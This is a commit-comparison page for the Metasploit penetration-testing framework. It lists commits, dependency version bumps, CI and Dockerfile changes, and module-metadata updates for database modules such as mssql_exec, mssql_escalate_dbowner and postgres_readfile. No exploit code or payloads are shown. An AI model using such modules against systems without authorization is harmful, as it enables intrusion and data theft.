Compare commits
218 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
 Christophe De La Fuente
|
a1a0df74eb | ||
|
Metasploit
|
aefebd996a | ||
|
Jack Heysel
|
0aa20c73a4 | ||
|
dwelch-r7
|
cc565a1731 | ||
|
adfoster-r7
|
82c2eb9899 | ||
|
cgranleese-r7
|
7b618d4f41 | ||
|
Dean Welch
|
bf1608a4ad | ||
|
Metasploit
|
f70667124f | ||
|
bwatters
|
d21e4080a9 | ||
|
Spencer McIntyre
|
b79790cff6 | ||
|
adfoster-r7
|
06b3004af4 | ||
|
cgranleese-r7
|
a30a7f81e5 | ||
|
Dean Welch
|
e288592beb | ||
|
Dean Welch
|
901a972a71 | ||
|
cgranleese-r7
|
4fcb4a4e3a | ||
|
cgranleese-r7
|
768ad16d8c | ||
|
Dean Welch
|
175d584ff7 | ||
|
sjanusz-r7
|
200d03c417 | ||
|
Metasploit
|
a3d8b0f77a | ||
|
cgranleese-r7
|
e66f6c106b | ||
|
cgranleese-r7
|
3be5988679 | ||
|
Metasploit
|
2cc8281db7 | ||
|
cgranleese-r7
|
c2a217efcd | ||
|
adfoster-r7
|
5735c7cb89 | ||
|
dwelch-r7
|
6db865a46c | ||
|
sjanusz-r7
|
b2f36e41c4 | ||
|
Metasploit
|
66696d201b | ||
|
cgranleese-r7
|
db3b2de3f3 | ||
|
dwelch-r7
|
0108f1f214 | ||
|
cgranleese-r7
|
de17261926 | ||
|
sjanusz-r7
|
64ab62f2c3 | ||
|
adfoster-r7
|
ca367bc87b | ||
|
Metasploit
|
19c1a35592 | ||
|
Jack Heysel
|
8cddffa3d1 | ||
|
Metasploit
|
eef29a5100 | ||
|
sjanusz-r7
|
bc6bf1c4f3 | ||
|
Jack Heysel
|
a1b0ff0fcf | ||
|
sjanusz-r7
|
fc963bd8bb | ||
|
adfoster-r7
|
94f0d243c7 | ||
|
Christophe De La Fuente
|
da9164fcc6 | ||
|
jlownie
|
90ed3cd00a | ||
|
jlownie
|
0e98da39c2 | ||
|
adfoster-r7
|
bbe1098b13 | ||
|
Metasploit
|
e15fd1a782 | ||
|
Jack Heysel
|
6c252de974 | ||
|
adfoster-r7
|
7b56d012e8 | ||
|
adfoster-r7
|
40701bf59a | ||
|
upsidedwn
|
8dcb409d25 | ||
|
Metasploit
|
1d9a08f405 | ||
|
adfoster-r7
|
e49c6a792a | ||
|
Metasploit
|
8e3daa5179 | ||
|
adfoster-r7
|
1d406cfc2a | ||
|
h00die-gr3y
|
d716e60cf2 | ||
|
h00die-gr3y
|
f5c71d09c2 | ||
|
H00die.Gr3y
|
8b70cefd83 | ||
|
H00die.Gr3y
|
996ca8a7c9 | ||
|
h00die-gr3y
|
f75722ecf2 | ||
|
h00die-gr3y
|
dde7e3c5d3 | ||
|
h00die-gr3y
|
eafdb8495b | ||
|
h00die-gr3y
|
d5f30befbb | ||
|
h00die-gr3y
|
3db32da70f | ||
|
h00die-gr3y
|
5f703b2e28 | ||
|
Spencer McIntyre
|
eca99e2c77 | ||
|
Spencer McIntyre
|
27ccb26de1 | ||
|
Spencer McIntyre
|
a75013e51a | ||
|
Jack Heysel
|
d987b81591 | ||
|
Metasploit
|
7228a2ad20 | ||
|
Christophe De La Fuente
|
747d328bcb | ||
|
Dean Welch
|
fa5c4c0193 | ||
|
Dean Welch
|
0d4e1ed755 | ||
|
Dean Welch
|
587a8690a1 | ||
|
Dean Welch
|
08872d0211 | ||
|
Dean Welch
|
0f319bdfb9 | ||
|
Spencer McIntyre
|
df81cda304 | ||
|
Metasploit
|
3447ca37ea | ||
|
Christophe De La Fuente
|
fc5a12431c | ||
|
dwelch-r7
|
bd78f03c98 | ||
|
adfoster-r7
|
0d250c49fa | ||
|
Metasploit
|
2409d132ae | ||
|
adfoster-r7
|
1794a5fbee | ||
|
Zach Goldman
|
d18520adc6 | ||
|
Metasploit
|
9b4d6f1219 | ||
|
Christophe De La Fuente
|
cb290d8032 | ||
|
Zach Goldman
|
c05c6773df | ||
|
Spencer McIntyre
|
1cd5b707bb | ||
|
Spencer McIntyre
|
49e689d909 | ||
|
Spencer McIntyre
|
9c6e1a584a | ||
|
sfewer-r7
|
423bf0c519 | ||
|
adfoster-r7
|
34a8b6c29c | ||
|
Dean Welch
|
94005719f4 | ||
|
Metasploit
|
ef54cfd0f3 | ||
|
adfoster-r7
|
b762d2ba65 | ||
|
Metasploit
|
d49f60282c | ||
|
Spencer McIntyre
|
202db99004 | ||
|
Metasploit
|
793f3557a2 | ||
|
Spencer McIntyre
|
45365c8666 | ||
|
Spencer McIntyre
|
ce0498377d | ||
|
Spencer McIntyre
|
8eb5aa6aa6 | ||
|
adfoster-r7
|
88e1e2e932 | ||
|
adfoster-r7
|
84f4c3c13f | ||
|
adfoster-r7
|
9e456a27e3 | ||
|
dwelch-r7
|
8717e91a3c | ||
|
Spencer McIntyre
|
d67aa2e250 | ||
|
cgranleese-r7
|
982f92b9b6 | ||
|
dwelch-r7
|
8106dbe5e0 | ||
|
cgranleese-r7
|
450fd0876f | ||
|
Dean Welch
|
43eb2a7c9b | ||
|
Metasploit
|
69eaf75b7a | ||
|
cgranleese-r7
|
b40f36e62a | ||
|
Christophe De La Fuente
|
a90ff41f71 | ||
|
dwelch-r7
|
2f4a1ac300 | ||
|
Spencer McIntyre
|
7e5938061c | ||
|
Dean Welch
|
f9fb803af7 | ||
|
adfoster-r7
|
5fa1ce8ed2 | ||
|
adfoster-r7
|
3cf3d0995e | ||
|
cgranleese-r7
|
699afaff45 | ||
|
cgranleese-r7
|
5d165466ff | ||
|
Spencer McIntyre
|
5036d28b44 | ||
|
Zach Goldman
|
94223f05fc | ||
|
Metasploit
|
1d2acd67e4 | ||
|
cgranleese-r7
|
285fbe5ac5 | ||
|
Metasploit
|
c1df6f2647 | ||
|
adfoster-r7
|
dc47d03503 | ||
|
adfoster-r7
|
72932bdae1 | ||
|
adfoster-r7
|
37ee910d2f | ||
|
Metasploit
|
0c83ad46aa | ||
|
sjanusz-r7
|
30fc29e0f5 | ||
|
adfoster-r7
|
9caa2fac17 | ||
|
Spencer McIntyre
|
99b2bfec1f | ||
|
Zach Goldman
|
2c60780dc0 | ||
|
sfewer-r7
|
1f292c8a73 | ||
|
Spencer McIntyre
|
1b2a2af4d4 | ||
|
Spencer McIntyre
|
56d2dfa46a | ||
|
Spencer McIntyre
|
934b10a626 | ||
|
Spencer McIntyre
|
630301a0df | ||
|
Spencer McIntyre
|
1cab98f4c2 | ||
|
Spencer McIntyre
|
62e960352f | ||
|
Spencer McIntyre
|
243ebcb3a6 | ||
|
Spencer McIntyre
|
c1a08b97d2 | ||
|
Spencer McIntyre
|
11ca24e290 | ||
|
Spencer McIntyre
|
5c9b454291 | ||
|
Spencer McIntyre
|
2653a180e4 | ||
|
Spencer McIntyre
|
648a7b394d | ||
|
Spencer McIntyre
|
bd7d4f0099 | ||
|
Spencer McIntyre
|
fcd84a41aa | ||
|
Spencer McIntyre
|
d940bfd312 | ||
|
Spencer McIntyre
|
2cf706e91f | ||
|
Spencer McIntyre
|
43a7993215 | ||
|
Spencer McIntyre
|
470a28921e | ||
|
Spencer McIntyre
|
3c716041bd | ||
|
Spencer McIntyre
|
3445c1b588 | ||
|
Spencer McIntyre
|
a5dc63617f | ||
|
Spencer McIntyre
|
464d2eef73 | ||
|
Spencer McIntyre
|
7fe10d8613 | ||
|
Spencer McIntyre
|
282f97ba2d | ||
|
Spencer McIntyre
|
319cff7d3a | ||
|
Spencer McIntyre
|
fd943f1401 | ||
|
Spencer McIntyre
|
c780bfcb66 | ||
|
Spencer McIntyre
|
20f73867ca | ||
|
Spencer McIntyre
|
6fdfd7147c | ||
|
Spencer McIntyre
|
9181d93807 | ||
|
dwelch-r7
|
87e78d4f8d | ||
|
Metasploit
|
0625e84b57 | ||
|
adfoster-r7
|
8b71afdd53 | ||
|
Metasploit
|
d3bde6b172 | ||
|
cgranleese-r7
|
02ae96edb0 | ||
|
cgranleese-r7
|
b060809a8d | ||
|
upsidedwn
|
4b5d04e59e | ||
|
upsidedwn
|
ccb446f2ae | ||
|
upsidedwn
|
436efad4ca | ||
|
upsidedwn
|
47d30696bc | ||
|
h00die
|
84278b8e0e | ||
|
cgranleese-r7
|
e80f0ef8cd | ||
|
sfewer-r7
|
03a58c784b | ||
|
sfewer-r7
|
367783bcb5 | ||
|
lihe07
|
29524fa7f8 | ||
|
Zach Goldman
|
23e184c9ce | ||
|
cgranleese-r7
|
577304cf7c | ||
|
cgranleese-r7
|
ae1cb57dc3 | ||
|
Jeffrey Martin
|
bed552d26e | ||
|
adfoster-r7
|
2a4d50c6e7 | ||
|
Jeffrey Martin
|
1c334ad670 | ||
|
Jeffrey Martin
|
e5b5f12a4e | ||
|
h00die
|
2efbf6e2f5 | ||
|
Spencer McIntyre
|
44916e67d5 | ||
|
Spencer McIntyre
|
3d476f4ef3 | ||
|
Spencer McIntyre
|
b9cf7ba894 | ||
|
Spencer McIntyre
|
1c36d89942 | ||
|
Spencer McIntyre
|
c9504f9c53 | ||
|
Spencer McIntyre
|
96316a94fe | ||
|
Spencer McIntyre
|
b5906418c2 | ||
|
Spencer McIntyre
|
33306fa4dd | ||
|
Spencer McIntyre
|
a8c240f671 | ||
|
Jeffrey Martin
|
4cb18483d6 | ||
|
Jeffrey Martin
|
d20ef7a08b | ||
|
Jeffrey Martin
|
bcefde29c3 | ||
|
h00die
|
d7cf9155a6 | ||
|
Jeffrey Martin
|
5a14575a31 | ||
|
h00die
|
6de51a5047 | ||
|
h00die
|
077cad34ab | ||
|
Jeffrey Martin
|
6d298c379b | ||
|
Jeffrey Martin
|
a4e8714de6 | ||
|
Nishant Desai
|
a09cf6471a | ||
|
Jeffrey Martin
|
2ab1b7a310 | ||
|
adfoster-r7
|
4e106c2a73 | ||
|
JustAnda7
|
6ba5d03993 | ||
|
JustAnda7
|
672d651221 | ||
|
Nishant Desai
|
70c69f46a5 | ||
|
JustAnda7
|
7876912eab | ||
|
JustAnda7
|
ea189d6c34 | ||
|
Nishant Desai
|
1a3b00e593 | ||
|
JustAnda7
|
6972a910fb | ||
|
Jeffrey Martin
|
6b5fff6c33 | ||
|
JustAnda7
|
05d6e9815d | ||
|
JustAnda7
|
79d3cc81cb | ||
|
JustAnda7
|
8e33badd80 | ||
|
Nishant Desai
|
823824163e | ||
|
Nishant Desai
|
e3c97148e8 |
@@ -38,6 +38,7 @@ on:
|
||||
- 'lib/msf/core/**'
|
||||
- 'tools/dev/**'
|
||||
- 'spec/acceptance/**'
|
||||
- 'spec/support/acceptance/**'
|
||||
- 'spec/acceptance_spec_helper.rb'
|
||||
# Example of running as a cron, to weed out flaky tests
|
||||
# schedule:
|
||||
|
||||
@@ -74,9 +74,6 @@ jobs:
|
||||
exclude:
|
||||
- { os: ubuntu-latest, ruby: '3.0' }
|
||||
include:
|
||||
- os: ubuntu-latest
|
||||
ruby: '3.1'
|
||||
test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DATASTORE_FALLBACKS=1'
|
||||
- os: ubuntu-latest
|
||||
ruby: '3.1'
|
||||
test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
|
||||
|
||||
+6
-2
@@ -1,7 +1,8 @@
|
||||
FROM ruby:3.1.4-alpine3.18 AS builder
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
|
||||
ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
|
||||
ARG BUNDLER_FORCE_CLEAN="true"
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV TOOLS_HOME=/usr/src/tools
|
||||
ENV BUNDLE_IGNORE_MESSAGES="true"
|
||||
@@ -33,8 +34,11 @@ RUN apk add --no-cache \
|
||||
go \
|
||||
&& echo "gem: --no-document" > /etc/gemrc \
|
||||
&& gem update --system \
|
||||
&& bundle config $BUNDLER_ARGS \
|
||||
&& bundle config $BUNDLER_CONFIG_ARGS \
|
||||
&& bundle install --jobs=8 \
|
||||
&& if [ "${BUNDLER_FORCE_CLEAN}" == "true" ]; then \
|
||||
bundle clean --force; \
|
||||
fi \
|
||||
# temp fix for https://github.com/bundler/bundler/issues/6680
|
||||
&& rm -rf /usr/local/bundle/cache \
|
||||
# needed so non root users can read content of the bundle
|
||||
|
||||
+5
-5
@@ -1,7 +1,7 @@
|
||||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (6.3.55)
|
||||
metasploit-framework (6.3.57)
|
||||
actionpack (~> 7.0.0)
|
||||
activerecord (~> 7.0.0)
|
||||
activesupport (~> 7.0.0)
|
||||
@@ -33,7 +33,7 @@ PATH
|
||||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 2.0.165)
|
||||
metasploit-payloads (= 2.0.166)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 1.0.26)
|
||||
mqtt
|
||||
@@ -265,7 +265,7 @@ GEM
|
||||
activesupport (~> 7.0)
|
||||
railties (~> 7.0)
|
||||
zeitwerk
|
||||
metasploit-credential (6.0.6)
|
||||
metasploit-credential (6.0.7)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models (>= 5.0.0)
|
||||
@@ -279,7 +279,7 @@ GEM
|
||||
activemodel (~> 7.0)
|
||||
activesupport (~> 7.0)
|
||||
railties (~> 7.0)
|
||||
metasploit-payloads (2.0.165)
|
||||
metasploit-payloads (2.0.166)
|
||||
metasploit_data_models (6.0.3)
|
||||
activerecord (~> 7.0)
|
||||
activesupport (~> 7.0)
|
||||
@@ -419,7 +419,7 @@ GEM
|
||||
metasm
|
||||
rex-core
|
||||
rex-text
|
||||
rex-socket (0.1.55)
|
||||
rex-socket (0.1.56)
|
||||
rex-core
|
||||
rex-sslscan (0.1.10)
|
||||
rex-core
|
||||
|
||||
+4
-4
@@ -79,10 +79,10 @@ macaddr, 1.7.2, ruby
|
||||
memory_profiler, 1.0.1, MIT
|
||||
metasm, 1.0.5, LGPL-2.1
|
||||
metasploit-concern, 5.0.2, "New BSD"
|
||||
metasploit-credential, 6.0.6, "New BSD"
|
||||
metasploit-framework, 6.3.55, "New BSD"
|
||||
metasploit-credential, 6.0.7, "New BSD"
|
||||
metasploit-framework, 6.3.57, "New BSD"
|
||||
metasploit-model, 5.0.2, "New BSD"
|
||||
metasploit-payloads, 2.0.165, "3-clause (or ""modified"") BSD"
|
||||
metasploit-payloads, 2.0.166, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 6.0.3, "New BSD"
|
||||
metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
|
||||
method_source, 1.0.0, MIT
|
||||
@@ -149,7 +149,7 @@ rex-powershell, 0.1.99, "New BSD"
|
||||
rex-random_identifier, 0.1.11, "New BSD"
|
||||
rex-registry, 0.1.5, "New BSD"
|
||||
rex-rop_builder, 0.1.5, "New BSD"
|
||||
rex-socket, 0.1.55, "New BSD"
|
||||
rex-socket, 0.1.56, "New BSD"
|
||||
rex-sslscan, 0.1.10, "New BSD"
|
||||
rex-struct2, 0.1.4, "New BSD"
|
||||
rex-text, 0.2.53, "New BSD"
|
||||
|
||||
@@ -16,6 +16,8 @@ services:
|
||||
enabled: yes
|
||||
- type: IMAP
|
||||
enabled: yes
|
||||
- type: LDAP
|
||||
enabled: yes
|
||||
- type: MSSQL
|
||||
enabled: yes
|
||||
- type: MySQL
|
||||
|
||||
@@ -0,0 +1,188 @@
|
||||
[
|
||||
{
|
||||
"name": "v0.7.1",
|
||||
"commit": {
|
||||
"sha": "56fa824510d8a35b08e3b42bf6625c846e2ed5a0"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.7.0",
|
||||
"commit": {
|
||||
"sha": "fdd9ad94c11d44259ef26bf4b2dc9a8bd139f607"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.6.2",
|
||||
"commit": {
|
||||
"sha": "b0c367cac7211117e88a55517396764036ac0552"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.6.1",
|
||||
"commit": {
|
||||
"sha": "ef0dacb0c36a1a180ef8fda670c82854658aab00"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.6.0",
|
||||
"commit": {
|
||||
"sha": "e72f6d6d5dd078df2d270cc48a4087588443f89a"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.5.0",
|
||||
"commit": {
|
||||
"sha": "027d9b4653e2f3ea13d4de6a0b2bd568106ffb40"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.4.0",
|
||||
"commit": {
|
||||
"sha": "521ba0cb2f63110eb2ed13a7054a4d70238a862a"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.3.3",
|
||||
"commit": {
|
||||
"sha": "38c4cf7dd9275294348bab903be9dc12eafe37dd"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.3.2",
|
||||
"commit": {
|
||||
"sha": "9d9d31a6694ab1fc12da20ea18fa5a778ce5a631"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.3.1",
|
||||
"commit": {
|
||||
"sha": "e75c251013845f1921ea75c24b44fd7164ee398d"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.3.0",
|
||||
"commit": {
|
||||
"sha": "9606d7ee5ab3b8056b4a69610ae79b7b473d779d"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.2.1",
|
||||
"commit": {
|
||||
"sha": "da29a200cd8ec46da709e0523787479ac6fb274b"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.2.0",
|
||||
"commit": {
|
||||
"sha": "2e345f6f6caeb3495f6454bfaa5a10bf50639411"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.1.0",
|
||||
"commit": {
|
||||
"sha": "1869a7f0a85ceaa707ea25866da98a3ac5a0667e"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.10",
|
||||
"commit": {
|
||||
"sha": "f08970c1d8910091a392d26b51db33b5c99a0f81"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.9",
|
||||
"commit": {
|
||||
"sha": "f98abfb79dc2c437f1b6cb5f534da560c85c5406"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.8",
|
||||
"commit": {
|
||||
"sha": "222cf2c65189c97877491c7bcc6fc14982ce65d7"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.7",
|
||||
"commit": {
|
||||
"sha": "2a743a5bf4b27a6cc9cb857bd178c2e724d98821"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.6",
|
||||
"commit": {
|
||||
"sha": "f6253b6bfaa249236ac1b4f0505f4b7af8f89116"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.5",
|
||||
"commit": {
|
||||
"sha": "abae56b3d0d2383d0351280213236cd988fd6d28"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.4",
|
||||
"commit": {
|
||||
"sha": "4190d76f2fefb65cb898f6c648e932b2c1a5fba3"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.3",
|
||||
"commit": {
|
||||
"sha": "8057dc123f23f6da9752d712edeb5e7e490b648c"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.2",
|
||||
"commit": {
|
||||
"sha": "f5bb336a75351379dad289b73a85f6ebf8ff5498"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.1",
|
||||
"commit": {
|
||||
"sha": "ed08f278f95dca46e58e24a13923939d268eedd3"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.7.1",
|
||||
"commit": {
|
||||
"sha": "c998e17e8322a867c02ef4cdf577aa33c2d3a81e"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.7.0",
|
||||
"commit": {
|
||||
"sha": "78cc4dd981a89b26006fea0984f1305bc663281f"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.6.2",
|
||||
"commit": {
|
||||
"sha": "838fb604d569dae18a1a7a85ef28ed2c125df986"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.6.1",
|
||||
"commit": {
|
||||
"sha": "4a1e987a1d2a958119ab5c936d4b1d82125e14d9"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.6.0",
|
||||
"commit": {
|
||||
"sha": "f2a2574ddc8bbe20776071569935922c3593d5e7"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.5.4",
|
||||
"commit": {
|
||||
"sha": "334ba3df99dfc84385faace167f6410c8ce0be91"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.5.3",
|
||||
"commit": {
|
||||
"sha": "cbb166026d8c6360836def9bf9c208313023961c"
|
||||
}
|
||||
}
|
||||
]
|
||||
@@ -88,6 +88,7 @@ strtab:
|
||||
db 0
|
||||
db 0
|
||||
strtabsz equ $ - strtab
|
||||
|
||||
align 16
|
||||
global _start
|
||||
_start:
|
||||
|
||||
|
||||
Binary file not shown.
+4238
-577
@@ -6775,7 +6775,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-08-16 21:40:03 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_enum.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_enum",
|
||||
@@ -6784,7 +6784,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -6825,7 +6827,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-13 13:00:38 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_enum_domain_accounts",
|
||||
@@ -6974,7 +6976,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_escalate_dbowner",
|
||||
@@ -6983,7 +6985,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7073,7 +7077,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2020-09-22 02:56:51 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_escalate_execute_as",
|
||||
@@ -7082,7 +7086,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7174,7 +7180,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2021-04-12 14:48:25 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_exec.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_exec",
|
||||
@@ -7183,7 +7189,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7228,7 +7236,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-07 15:02:53 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_findandsampledata",
|
||||
@@ -7237,7 +7245,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7277,7 +7287,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2022-06-29 12:20:37 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_idf",
|
||||
@@ -7286,7 +7296,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7427,7 +7439,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-08-24 21:38:44 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_sql.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_sql",
|
||||
@@ -7436,7 +7448,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7476,7 +7490,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-08-24 21:38:44 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_sql_file",
|
||||
@@ -7485,7 +7499,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7517,7 +7533,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mysql/mysql_enum.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mysql/mysql_enum",
|
||||
@@ -7526,7 +7542,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7558,7 +7576,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/mysql/mysql_sql.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mysql/mysql_sql",
|
||||
@@ -7567,7 +7585,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -8990,7 +9010,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-07 15:02:53 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/postgres/postgres_readfile",
|
||||
@@ -8999,7 +9019,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -9031,7 +9053,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-08-24 21:38:44 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/postgres/postgres_sql.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/postgres/postgres_sql",
|
||||
@@ -9040,7 +9062,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -9956,7 +9980,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
